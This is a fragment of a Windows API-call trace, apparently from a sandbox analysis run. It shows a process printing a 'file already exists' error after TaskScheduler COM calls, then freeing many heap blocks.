GetProcessHeap () returned 0x600000 [0172.619] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0xe) returned 0x621080 [0172.619] GetProcessHeap () returned 0x600000 [0172.619] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x6210f8 [0172.619] _memicmp (_Buf1=0x6210f8, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.619] GetProcessHeap () returned 0x600000 [0172.619] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x1000) returned 0x627148 [0172.620] _vsnwprintf (in: _Buffer=0x627148, _BufferCount=0x7ff, _Format="%s ", _ArgList=0x25c800 | out: _Buffer="ERROR: ") returned 7 [0172.620] _fileno (_File=0x76812940) returned 2 [0172.620] _errno () returned 0x8a07d8 [0172.620] _get_osfhandle (_FileHandle=2) returned 0xb [0172.620] _errno () returned 0x8a07d8 [0172.620] GetFileType (hFile=0xb) returned 0x2 [0172.620] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0172.620] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x25c798 | out: lpMode=0x25c798) returned 1 [0172.621] __iob_func () returned 0x76812900 [0172.621] __iob_func () returned 0x76812900 [0172.621] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0172.621] lstrlenW (lpString="ERROR: ") returned 7 [0172.621] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x627148*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x25c7c0, lpReserved=0x0 | out: lpBuffer=0x627148*, lpNumberOfCharsWritten=0x25c7c0*=0x7) returned 1 [0172.622] _fileno (_File=0x76812940) returned 2 [0172.622] _errno () returned 0x8a07d8 [0172.622] _get_osfhandle (_FileHandle=2) returned 0xb [0172.622] _errno () returned 0x8a07d8 [0172.622] GetFileType (hFile=0xb) returned 0x2 [0172.622] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0172.622] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x25c7c4 | out: lpMode=0x25c7c4) returned 1 [0172.623] __iob_func () returned 0x76812900 [0172.623] __iob_func () returned 0x76812900 [0172.623] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0172.623] lstrlenW (lpString="Cannot create a file when that file already exists.\r\n") returned 53 [0172.623] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x6248d0*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0x25c7ec, lpReserved=0x0 | out: lpBuffer=0x6248d0*, lpNumberOfCharsWritten=0x25c7ec*=0x35) returned 1 [0172.624] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x25c870 | out: pperrinfo=0x25c870*=0x0) returned 0x1 [0172.624] TaskScheduler:IUnknown:Release (This=0x8a3ea8) returned 0x0 [0172.624] TaskScheduler:IUnknown:Release (This=0x8a3e40) returned 0x1 [0172.624] lstrlenW (lpString="") returned 0 [0172.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp") returned 60 [0172.624] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x616aa8) returned 1 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x616aa8) returned 0x1fc [0172.625] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616aa8 | out: hHeap=0x600000) returned 1 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x616a20) returned 1 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x616a20) returned 0x7a [0172.625] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616a20 | out: hHeap=0x600000) returned 1 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615398) returned 1 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615398) returned 0x16 [0172.625] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615398 | out: hHeap=0x600000) returned 1 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614bd8) returned 1 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614bd8) returned 0x10 [0172.625] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614bd8 | out: hHeap=0x600000) returned 1 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] GetProcessHeap () returned 0x600000 [0172.625] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6153b8) returned 1 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6153b8) returned 0x14 [0172.626] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6153b8 | out: hHeap=0x600000) returned 1 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x616670) returned 1 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x616670) returned 0xa0 [0172.626] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616670 | out: hHeap=0x600000) returned 1 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614cb0) returned 1 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614cb0) returned 0x10 [0172.626] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614cb0 | out: hHeap=0x600000) returned 1 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615298) returned 1 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615298) returned 0x14 [0172.626] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615298 | out: hHeap=0x600000) returned 1 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x616998) returned 1 [0172.626] GetProcessHeap () returned 0x600000 [0172.626] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x616998) returned 0x7e [0172.626] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616998 | out: hHeap=0x600000) returned 1 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614d58) returned 1 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614d58) returned 0x10 [0172.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614d58 | out: hHeap=0x600000) returned 1 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615258) returned 1 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615258) returned 0x14 [0172.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615258 | out: hHeap=0x600000) returned 1 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614d40) returned 1 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614d40) returned 0xc [0172.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614d40 | out: hHeap=0x600000) returned 1 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614d28) returned 1 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614d28) returned 0x10 [0172.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614d28 | out: hHeap=0x600000) returned 1 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] GetProcessHeap () returned 0x600000 [0172.627] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615238) returned 1 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615238) returned 0x14 [0172.628] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615238 | out: hHeap=0x600000) returned 1 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615a80) returned 1 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615a80) returned 0x208 [0172.628] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615a80 | out: hHeap=0x600000) returned 1 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614c50) returned 1 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614c50) returned 0x10 [0172.628] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614c50 | out: hHeap=0x600000) returned 1 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6151f8) returned 1 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6151f8) returned 0x14 [0172.628] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6151f8 | out: hHeap=0x600000) returned 1 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x616718) returned 1 [0172.628] GetProcessHeap () returned 0x600000 [0172.628] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x616718) returned 0x200 [0172.629] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616718 | out: hHeap=0x600000) returned 1 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614cc8) returned 1 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614cc8) returned 0x10 [0172.629] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614cc8 | out: hHeap=0x600000) returned 1 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615198) returned 1 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615198) returned 0x14 [0172.629] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615198 | out: hHeap=0x600000) returned 1 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x627148) returned 1 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x627148) returned 0x1000 [0172.629] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x627148 | out: hHeap=0x600000) returned 1 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6210f8) returned 1 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6210f8) returned 0x10 [0172.629] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6210f8 | out: hHeap=0x600000) returned 1 [0172.629] GetProcessHeap () returned 0x600000 [0172.629] GetProcessHeap () returned 0x600000 [0172.630] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615178) returned 1 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615178) returned 0x14 [0172.630] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615178 | out: hHeap=0x600000) returned 1 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615318) returned 1 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615318) returned 0x14 [0172.630] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615318 | out: hHeap=0x600000) returned 1 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614d10) returned 1 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614d10) returned 0x10 [0172.630] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614d10 | out: hHeap=0x600000) returned 1 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615118) returned 1 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615118) returned 0x14 [0172.630] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615118 | out: hHeap=0x600000) returned 1 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615358) returned 1 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615358) returned 0x16 [0172.630] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615358 | out: hHeap=0x600000) returned 1 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] GetProcessHeap () returned 0x600000 [0172.630] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614ce0) returned 1 [0172.630] GetProcessHeap () returned 0x600000 [0172.631] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614ce0) returned 0x10 [0172.631] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614ce0 | out: hHeap=0x600000) returned 1 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6150e0) returned 1 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6150e0) returned 0x14 [0172.631] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6150e0 | out: hHeap=0x600000) returned 1 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6248d0) returned 1 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6248d0) returned 0x6c [0172.631] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6248d0 | out: hHeap=0x600000) returned 1 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614fc0) returned 1 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614fc0) returned 0x14 [0172.631] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614fc0 | out: hHeap=0x600000) returned 1 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614fe0) returned 1 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614fe0) returned 0x14 [0172.631] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614fe0 | out: hHeap=0x600000) returned 1 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] GetProcessHeap () returned 0x600000 [0172.631] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615000) returned 1 [0172.631] GetProcessHeap () returned 0x600000 [0172.632] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615000) returned 0x14 [0172.632] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615000 | out: hHeap=0x600000) returned 1 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615020) returned 1 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615020) returned 0x14 [0172.632] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615020 | out: hHeap=0x600000) returned 1 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6152b8) returned 1 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6152b8) returned 0x14 [0172.632] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6152b8 | out: hHeap=0x600000) returned 1 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6152d8) returned 1 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6152d8) returned 0x14 [0172.632] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6152d8 | out: hHeap=0x600000) returned 1 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x616920) returned 1 [0172.632] GetProcessHeap () returned 0x600000 [0172.632] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x616920) returned 0x30 [0172.632] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616920 | out: hHeap=0x600000) returned 1 [0172.632] GetProcessHeap () returned 0x600000 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6152f8) returned 1 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6152f8) returned 0x14 [0172.633] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6152f8 | out: hHeap=0x600000) returned 1 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x616958) returned 1 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x616958) returned 0x30 [0172.633] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616958 | out: hHeap=0x600000) returned 1 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615378) returned 1 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615378) returned 0x14 [0172.633] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615378 | out: hHeap=0x600000) returned 1 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x621080) returned 1 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x621080) returned 0xe [0172.633] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x621080 | out: hHeap=0x600000) returned 1 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615758) returned 1 [0172.633] GetProcessHeap () returned 0x600000 [0172.633] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615758) returned 0x14 [0172.634] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615758 | out: hHeap=0x600000) returned 1 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614c08) returned 1 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614c08) returned 0x10 [0172.634] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614c08 | out: hHeap=0x600000) returned 1 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615040) returned 1 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615040) returned 0x14 [0172.634] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615040 | out: hHeap=0x600000) returned 1 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615060) returned 1 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615060) returned 0x14 [0172.634] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615060 | out: hHeap=0x600000) returned 1 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615080) returned 1 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615080) returned 0x14 [0172.634] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615080 | out: hHeap=0x600000) returned 1 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] GetProcessHeap () returned 0x600000 [0172.634] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6150a0) returned 1 [0172.634] GetProcessHeap () returned 0x600000 [0172.635] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6150a0) returned 0x14 [0172.635] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6150a0 | out: hHeap=0x600000) returned 1 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614c20) returned 1 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614c20) returned 0x10 [0172.635] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614c20 | out: hHeap=0x600000) returned 1 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6150c0) returned 1 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6150c0) returned 0x14 [0172.635] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6150c0 | out: hHeap=0x600000) returned 1 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615138) returned 1 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615138) returned 0x14 [0172.635] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615138 | out: hHeap=0x600000) returned 1 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6151b8) returned 1 [0172.635] GetProcessHeap () returned 0x600000 [0172.635] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6151b8) returned 0x14 [0172.635] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6151b8 | out: hHeap=0x600000) returned 1 [0172.635] GetProcessHeap () returned 0x600000 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6151d8) returned 1 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6151d8) returned 0x14 [0172.636] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6151d8 | out: hHeap=0x600000) returned 1 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615278) returned 1 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615278) returned 0x14 [0172.636] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615278 | out: hHeap=0x600000) returned 1 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614c38) returned 1 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614c38) returned 0x10 [0172.636] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614c38 | out: hHeap=0x600000) returned 1 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615158) returned 1 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615158) returned 0x14 [0172.636] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615158 | out: hHeap=0x600000) returned 1 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614bf0) returned 1 [0172.636] GetProcessHeap () returned 0x600000 [0172.636] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614bf0) returned 